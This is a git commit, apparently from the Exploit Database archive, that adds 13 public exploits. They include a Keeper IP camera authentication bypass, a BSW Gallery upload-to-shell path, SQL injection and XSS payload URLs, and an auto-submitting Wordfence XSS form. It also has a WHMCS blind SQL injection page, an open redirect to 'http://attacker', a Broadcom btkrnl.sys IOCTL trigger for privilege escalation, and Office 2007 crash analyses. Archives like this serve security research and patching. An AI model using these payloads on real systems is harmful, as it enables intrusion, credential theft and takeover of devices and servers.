DB: 2015-08-26
13 new exploits
This commit is contained in:
parent
4497b423f7
commit
7c8aad6618
14 changed files with 375 additions and 0 deletions
13
files.csv
13
files.csv
|
@ -34271,3 +34271,16 @@ id,file,description,date,author,platform,type,port
|
|||
37956,platforms/php/webapps/37956.txt,"WordPress GeoPlaces3 Theme - Arbitrary File Upload Vulnerbility",2015-08-24,Mdn_Newbie,php,webapps,80
|
||||
37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - (.gas) Crash POC",2015-08-24,"_ Un_N0n _",windows,dos,0
|
||||
37958,platforms/multiple/remote/37958.rb,"Firefox PDF.js Privileged Javascript Injection",2015-08-24,metasploit,multiple,remote,0
|
||||
37959,platforms/php/webapps/37959.txt,"BSW Gallery 'uploadpic.php' Arbitrary File Upload Vulnerability",2012-10-18,"cr4wl3r ",php,webapps,0
|
||||
37960,platforms/php/webapps/37960.txt,"Amateur Photographer's Image Gallery force-download.php file Parameter Information Disclosure",2012-10-18,"cr4wl3r ",php,webapps,0
|
||||
37961,platforms/php/webapps/37961.txt,"Amateur Photographer's Image Gallery plist.php albumid Parameter SQL Injection",2012-10-18,"cr4wl3r ",php,webapps,0
|
||||
37962,platforms/php/webapps/37962.txt,"Amateur Photographer's Image Gallery plist.php albumid Parameter XSS",2012-10-18,"cr4wl3r ",php,webapps,0
|
||||
37963,platforms/php/webapps/37963.txt,"Amateur Photographer's Image Gallery fullscreen.php albumid Parameter SQL Injection",2012-10-18,"cr4wl3r ",php,webapps,0
|
||||
37964,platforms/windows/local/37964.c,"Broadcom WIDCOMM Bluetooth 'btkrnl.sys' Driver Local Privilege Escalation Vulnerability",2012-10-18,"Nikita Tarakanov",windows,local,0
|
||||
37965,platforms/hardware/webapps/37965.txt,"Keeper IP Camera 3.2.2.10 - Authentication Bypass",2015-08-25,"RAT - ThiefKing",hardware,webapps,0
|
||||
37966,platforms/windows/dos/37966.txt,"Microsoft Office 2007 OneTableDocumentStream Invalid Object",2015-08-25,"Google Security Research",windows,dos,0
|
||||
37967,platforms/windows/dos/37967.txt,"Microsoft Office 2007 Malformed Document Stack-Based Buffer Overflow",2015-08-25,"Google Security Research",windows,dos,0
|
||||
37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 'index.php' Script Cross Site Scripting Vulnerability",2012-10-19,Netsparker,php,webapps,0
|
||||
37969,platforms/hardware/remote/37969.txt,"FirePass <= 7.0 SSL VPN 'refreshURL' Parameter URI Redirection Vulnerability",2012-10-21,"Aung Khant",hardware,remote,0
|
||||
37970,platforms/php/webapps/37970.html,"WordPress Wordfence Security Plugin Cross Site Scripting Vulnerability",2012-10-18,MustLive,php,webapps,0
|
||||
37971,platforms/php/webapps/37971.html,"WHMCS 4.5.2 'googlecheckout.php' SQL Injection Vulnerability",2012-10-22,"Starware Security Team",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
9
platforms/hardware/remote/37969.txt
Executable file
9
platforms/hardware/remote/37969.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/56156/info
|
||||
|
||||
FirePass SSL VPN is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
A successful exploit may aid in phishing attacks; other attacks are possible.
|
||||
|
||||
Versions prior to FirePass 7.0.0 HF-70-7 and 6.1.0 HF-610-9 are vulnerable.
|
||||
|
||||
http://www.example.com/my.activation.cns.php3?langchar=&ui_translation=&refreshURL==http://attacker
|
21
platforms/hardware/webapps/37965.txt
Executable file
21
platforms/hardware/webapps/37965.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
# Exploit Title: Keeper IP Camera - Authentication Bypass
|
||||
# Date: 25/08/2015
|
||||
# Exploit Author: RAT - ThiefKing
|
||||
# Vendor Homepage: http://www.keeper.cn/en/Camera-ip.asp
|
||||
# Version: 3.2.2.10
|
||||
# WEB Version: 6.1.17.192
|
||||
# Tested on: QB200W, QB130W, QA130W,...
|
||||
|
||||
Exploit:
|
||||
1 - First, open your browser
|
||||
2 - Enter the IP address or domain to see the login screen of the camera
|
||||
3 - Now go to page umanage.asp (http://ipaddress:port/umanage.asp)
|
||||
|
||||
You can change or view passwords
|
||||
|
||||
TEST: http://server:88/login.asp
|
||||
--
|
||||
RAT - ThiefKing
|
||||
http://tromcap.com
|
||||
|
||||
|
56
platforms/php/webapps/37959.txt
Executable file
56
platforms/php/webapps/37959.txt
Executable file
|
@ -0,0 +1,56 @@
|
|||
source: http://www.securityfocus.com/bid/56109/info
|
||||
|
||||
BSW Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||
|
||||
Code in uploadpic.php
|
||||
|
||||
print "<form method=\"POST\" action=\"dopic.php\"enctype=\"multipart/form-data\" style=\"width: 227px\">";
|
||||
print "<table align=\"center\" style=\"width: 600px\"dir=\"ltr\"><tr><th align=\"right\"width=\"120\" class=\"topic\"><b>File Upload:</b></th>";
|
||||
print "<th align=\"left\"><input type=\"file\" name=\"fileupload\"></th></tr>";
|
||||
print "<tr><th><input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"10240000\"></th></tr></table>";
|
||||
print"<table align=\"center\"width=\"600\"dir=\"ltr\">";
|
||||
print"<th class=\"topic\"width=\"120\"align=\"right\">Image Title</th><th align=\"left\"><input style=\"width:400\"type=\"text\" name=\"picture\" /></th></table>";
|
||||
print"<table align=\"center\"dir=\"ltr\" width=\"600\"><th class=\"topic\" width=\"120\"align=\"right\">Image Description</th>";
|
||||
print"<th align=\"left\"><textarea name=\"descrip\"cols=\"48\"rows=\"5\"></textarea></th></table>";
|
||||
|
||||
Code in dopic.php
|
||||
|
||||
$fname=$_POST['picture'];
|
||||
$descrip=$_POST['descrip'];
|
||||
$file_dir ="gallery/";
|
||||
|
||||
|
||||
foreach($_FILES as $file_name => $file_array) {
|
||||
echo "path: ".$file_array["tmp_name"]."<br/>\n";
|
||||
echo "name: ".$file_array["name"]."<br/>\n";
|
||||
echo "type: ".$file_array["type"]."<br/>\n";
|
||||
|
||||
echo "size: ".$file_array["size"]."<br/>\n";
|
||||
|
||||
if (is_uploaded_file($file_array["tmp_name"])) {
|
||||
move_uploaded_file($file_array["tmp_name"], "$file_dir/".$file_array["name"]) or die ("Couldn't copy");
|
||||
echo "Done!<br/>";
|
||||
}
|
||||
|
||||
}
|
||||
$image=$file_dir.$file_array["name"];
|
||||
$ip = getenv("REMOTE_ADDR");
|
||||
$sql = "insert into gallery (picture,files,descrip,updated)values('$fname','$image','$descrip',now());";
|
||||
mysql_query($sql,$mysql);
|
||||
mysql_close($mysql);
|
||||
|
||||
------------------------------------------------------------------------------------
|
||||
Proof of Concept :
|
||||
http://www.example.com/path_gallery/uploadpic.php
|
||||
Shell :
|
||||
|
||||
http://www.example.com/path_gallery/gallery/shell.php
|
||||
|
||||
See for the demo :
|
||||
|
||||
http://www.example.com/demo/demo1.png
|
||||
http://www.example.com/demo/demo2.png
|
||||
http://www.example.com/demo/demo3.png
|
||||
|
9
platforms/php/webapps/37960.txt
Executable file
9
platforms/php/webapps/37960.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/56110/info
|
||||
|
||||
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
|
||||
|
||||
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/path_gallery/force-download.php?file=[RFD]
|
9
platforms/php/webapps/37961.txt
Executable file
9
platforms/php/webapps/37961.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/56110/info
|
||||
|
||||
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
|
||||
|
||||
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/path_gallery/plist.php?albumid=[SQLi]
|
9
platforms/php/webapps/37962.txt
Executable file
9
platforms/php/webapps/37962.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/56110/info
|
||||
|
||||
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
|
||||
|
||||
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/path_gallery/plist.php?albumid=[XSS]
|
9
platforms/php/webapps/37963.txt
Executable file
9
platforms/php/webapps/37963.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/56110/info
|
||||
|
||||
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
|
||||
|
||||
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/path_gallery/fullscreen.php?albumid=[SQLi]
|
9
platforms/php/webapps/37968.txt
Executable file
9
platforms/php/webapps/37968.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/56148/info
|
||||
|
||||
CMS Mini is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
CMS Mini 0.2.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/view/index.php?path='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000A3)%3C/script%3E&p=cms.guestbook&msg=Message%20sent
|
20
platforms/php/webapps/37970.html
Executable file
20
platforms/php/webapps/37970.html
Executable file
|
@ -0,0 +1,20 @@
|
|||
source: http://www.securityfocus.com/bid/56159/info
|
||||
|
||||
The Wordfence Security plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Wordfence Security 3.3.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<title>Wordfence Security XSS exploit (C) 2012 MustLive.
|
||||
http://websecurity.com.ua</title>
|
||||
</head>
|
||||
<body onLoad="document.hack.submit()">
|
||||
<form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
|
||||
<input type="hidden" name="email"
|
||||
value="<script>alert(document.cookie)</script>">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
37
platforms/php/webapps/37971.html
Executable file
37
platforms/php/webapps/37971.html
Executable file
|
@ -0,0 +1,37 @@
|
|||
source: http://www.securityfocus.com/bid/56173/info
|
||||
|
||||
WHMCS (WHM Complete Solution) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
WHMCS 4.5.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
#Proof of Concept :
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<title>WHMCS Blind SQL Injection POC</title>
|
||||
</head>
|
||||
<body>
|
||||
<script>
|
||||
var params = "<charge-amount-notification><google-order-number>0' %YOUR INJECTION HERE% -- -</google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>";
|
||||
var http = new XMLHttpRequest();
|
||||
try {
|
||||
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
|
||||
} catch (e) {
|
||||
alert("Permission UniversalBrowserRead denied.");
|
||||
}
|
||||
http.open("POST", "http://site.com/whmcs/modules/gateways/callback/googlecheckout.php", true);
|
||||
http.onreadystatechange = handleResponse;
|
||||
http.send(params);
|
||||
function handleResponse() {
|
||||
|
||||
if(http.readyState == 4 && http.status == 200){
|
||||
var response = http.responseText;
|
||||
alert(response);
|
||||
}
|
||||
}
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
68
platforms/windows/dos/37966.txt
Executable file
68
platforms/windows/dos/37966.txt
Executable file
|
@ -0,0 +1,68 @@
|
|||
Source: https://code.google.com/p/google-security-research/issues/detail?id=171&can=1
|
||||
|
||||
The following access violation was observed in Microsoft Office 2007
|
||||
(Word document):
|
||||
|
||||
(8c0.e68): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=0012dcf8 ebx=40000000 ecx=40000000 edx=0012de1c esi=40000000 edi=011f1400
|
||||
eip=32881800 esp=0012d010 ebp=0012d038 iopl=0 nv up ei pl nz na po nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
||||
mso!Ordinal7799+0x2fc:
|
||||
32881800 0fb74614 movzx eax,word ptr [esi+0x14] ds:0023:40000014=????
|
||||
0:000> k
|
||||
ChildEBP RetAddr
|
||||
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||
0012d038 328a0a4e mso!Ordinal7799+0x2fc
|
||||
0012ddd8 328a0a2c mso!Ordinal4388+0x1bc
|
||||
0012dde4 320c337c mso!Ordinal4388+0x19a
|
||||
0012de2c 320c330f wwlib!DllGetClassObject+0x850ba
|
||||
0012de74 312db32b wwlib!DllGetClassObject+0x8504d
|
||||
0012df1c 312dadf8 wwlib!FMain+0x96d7c
|
||||
0012df84 312da84c wwlib!FMain+0x96849
|
||||
0012e074 6be51b27 wwlib!FMain+0x9629d
|
||||
0012e114 6be5c65b MSPTLS!FsDestroyMemory+0x1ee4e
|
||||
0012e28c 6be5c94c MSPTLS!FsDestroyMemory+0x29982
|
||||
0012e2d8 6be36d59 MSPTLS!FsDestroyMemory+0x29c73
|
||||
0012e344 6be37f87 MSPTLS!FsDestroyMemory+0x4080
|
||||
0012e450 6be4e8eb MSPTLS!FsDestroyMemory+0x52ae
|
||||
0012e4e0 6be4f1ff MSPTLS!FsDestroyMemory+0x1bc12
|
||||
0012e584 6be4f362 MSPTLS!FsDestroyMemory+0x1c526
|
||||
0012e624 6be4f5cc MSPTLS!FsDestroyMemory+0x1c689
|
||||
0012e7d8 6be35d9f MSPTLS!FsDestroyMemory+0x1c8f3
|
||||
0012e8ec 6be630b5 MSPTLS!FsDestroyMemory+0x30c6
|
||||
0012e970 6be40ee2 MSPTLS!FsDestroyMemory+0x303dc
|
||||
0012e9e4 6be63a7a MSPTLS!FsDestroyMemory+0xe209
|
||||
|
||||
Notes:
|
||||
|
||||
- Reproduce on Windows Server 2003 and Windows 7.
|
||||
|
||||
- The crash occurs due to an invalid read dereference of a bad object
|
||||
pointer. If the word value read is controlled and set to a value other
|
||||
than 0xFFFF, then a controlled value is used as an indirect call
|
||||
target (at 328A1DD4 in MSO.dll 12.0.6683.5000).
|
||||
|
||||
- The bad object pointer is passed in to MSO.dll from wwlib.dll
|
||||
(second argument of function at 328A0A16 in MSO.dll 12.0.6683.5000).
|
||||
|
||||
- The test-case reduces to a 50-bit difference from the original
|
||||
sample document.
|
||||
|
||||
- The affected bits lie in the OneTableDocumentStream's data section,
|
||||
as well as as PlcfSed's aCP[0] field and PNFKPPAPX[44]'s pn field.
|
||||
|
||||
- The copy operation at 3126A36C (wwlib.dll 12.0.6707.5000) uses a
|
||||
source buffer from the OneTableDocumentStream's data section, and
|
||||
copies this invalid data into a stack buffer. The bad object pointer
|
||||
comes from this stack-based structure.
|
||||
|
||||
- Attached files: 037542f7_crash.rtf (crashing file),
|
||||
037542f7_orig.doc (original file). A test case with full control of
|
||||
the crashing register value (0xAAAAAAAA) is also attached
|
||||
(037542f7_full.doc)
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37966.zip
|
||||
|
65
platforms/windows/dos/37967.txt
Executable file
65
platforms/windows/dos/37967.txt
Executable file
|
@ -0,0 +1,65 @@
|
|||
Source: https://code.google.com/p/google-security-research/issues/detail?id=170&can=1
|
||||
|
||||
The following access violation was observed in Microsoft Office 2007
|
||||
(Word document):
|
||||
|
||||
(e24.e28): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=0583a748 ebx=00eb4684 ecx=003ad1a3 edx=00000000 esi=049860bc edi=00122238
|
||||
eip=7814500a esp=001221e0 ebp=001221e8 iopl=0 nv up ei pl nz ac pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
|
||||
MSVCR80!memcpy+0x5a:
|
||||
7814500a f3a5 rep movsd ds:049860bc=???????? es:00122238=3348bcd8
|
||||
0:000> k
|
||||
ChildEBP RetAddr
|
||||
001221e8 31249c0e MSVCR80!memcpy+0x5a
|
||||
00122204 3126a371 wwlib!FMain+0x565f
|
||||
00122220 3203de3c wwlib!FMain+0x25dc2
|
||||
00122268 320dab4c wwlib!DllCanUnloadNow+0x56a6bb
|
||||
00122280 31fc363f wwlib!DllGetClassObject+0x9c88a
|
||||
0012229c 31f9acde wwlib!DllCanUnloadNow+0x4efebe
|
||||
001222b4 31f9b0e5 wwlib!DllCanUnloadNow+0x4c755d
|
||||
00122308 31bd68c2 wwlib!DllCanUnloadNow+0x4c7964
|
||||
001223bc 3201a69b wwlib!DllCanUnloadNow+0x103141
|
||||
00122a68 3129f4eb wwlib!DllCanUnloadNow+0x546f1a
|
||||
00123b68 3129e8e5 wwlib!FMain+0x5af3c
|
||||
00123bac 32073906 wwlib!FMain+0x5a336
|
||||
00126d28 32073627 wwlib!DllGetClassObject+0x35644
|
||||
0012b14c 32073294 wwlib!DllGetClassObject+0x35365
|
||||
0012b19c 3209ac20 wwlib!DllGetClassObject+0x34fd2
|
||||
0012e2f8 3208c781 wwlib!DllGetClassObject+0x5c95e
|
||||
0012e31c 31314684 wwlib!DllGetClassObject+0x4e4bf
|
||||
0012f580 320e04b7 wwlib!FMain+0xd00d5
|
||||
0012f630 320e037f wwlib!DllGetClassObject+0xa21f5
|
||||
0012f648 32812493 wwlib!DllGetClassObject+0xa20bd
|
||||
|
||||
Notes:
|
||||
|
||||
- Reproduces on Windows Server 2003 and Windows 7
|
||||
|
||||
- The crash occurs due to a memcpy with an invalid source buffer.
|
||||
|
||||
- The invalid source buffer is actually indicative of an invalid size
|
||||
being used in a pointer calculation at 3126A360 (wwlib.dll
|
||||
12.0.6707.5000). This invalid size can also be seen in ecx at the time
|
||||
of access violation.
|
||||
|
||||
- The large size parameter can result in a stack-based buffer overflow.
|
||||
|
||||
- Alternatively, if the copy operation succeeds (by using a size value
|
||||
large enough to result in an out-of-bounds source buffer, but not so
|
||||
large to cause an access violation during copy), then it is also
|
||||
possible to get an arbitrary free from later usage of controlled
|
||||
pointers in the destination buffer.
|
||||
|
||||
- The crashing test case was created using a chunk reordering
|
||||
strategy, and does not cleanly minimize (106 bit change from original
|
||||
file).
|
||||
|
||||
- Attached files: 86ea4a3c_crash.rtf (crashing file),
|
||||
86ea4a3c_orig.doc (original file)
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37967.zip
|
||||
|
41
platforms/windows/local/37964.c
Executable file
41
platforms/windows/local/37964.c
Executable file
|
@ -0,0 +1,41 @@
|
|||
source: http://www.securityfocus.com/bid/56124/info
|
||||
|
||||
Broadcom WIDCOMM Bluetooth is prone to a local privilege-escalation vulnerability.
|
||||
|
||||
A local attacker may exploit this issue to gain escalated privileges and execute arbitrary code with kernel privileges. Failed exploit attempts may result in a denial-of-service condition.
|
||||
|
||||
Broadcom WIDCOMM Bluetooth 5.6.0.6950 is vulnerable; other versions may also be affected.
|
||||
|
||||
HANDLE hDevice;
|
||||
char *inbuff, *outbuff;
|
||||
DWORD ioctl, len,;
|
||||
|
||||
if ( (hDevice = CreateFileA("\\\\.\\btkrnl",
|
||||
0,
|
||||
0,
|
||||
0,
|
||||
OPEN_EXISTING,
|
||||
0,
|
||||
NULL) ) != INVALID_HANDLE_VALUE )
|
||||
{
|
||||
printf("Device succesfully opened!\n");
|
||||
}
|
||||
else
|
||||
{
|
||||
printf("Error: Error opening device \n");
|
||||
return 0;
|
||||
}
|
||||
inbuff = (char*)malloc(0x12000);
|
||||
if(!inbuff){
|
||||
printf("malloc failed!\n");
|
||||
return 0;
|
||||
}
|
||||
outbuff = (char*)malloc(0x12000);
|
||||
if(!outbuff){
|
||||
printf("malloc failed!\n");
|
||||
return 0;
|
||||
}
|
||||
ioctl = 0x2A04C0;
|
||||
memset(inbuff, 0x41, 0x70);
|
||||
DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, 0x70, (LPVOID)outbuff, 0x70, &len, NULL);
|
||||
|
Loading…
Add table
Reference in a new issue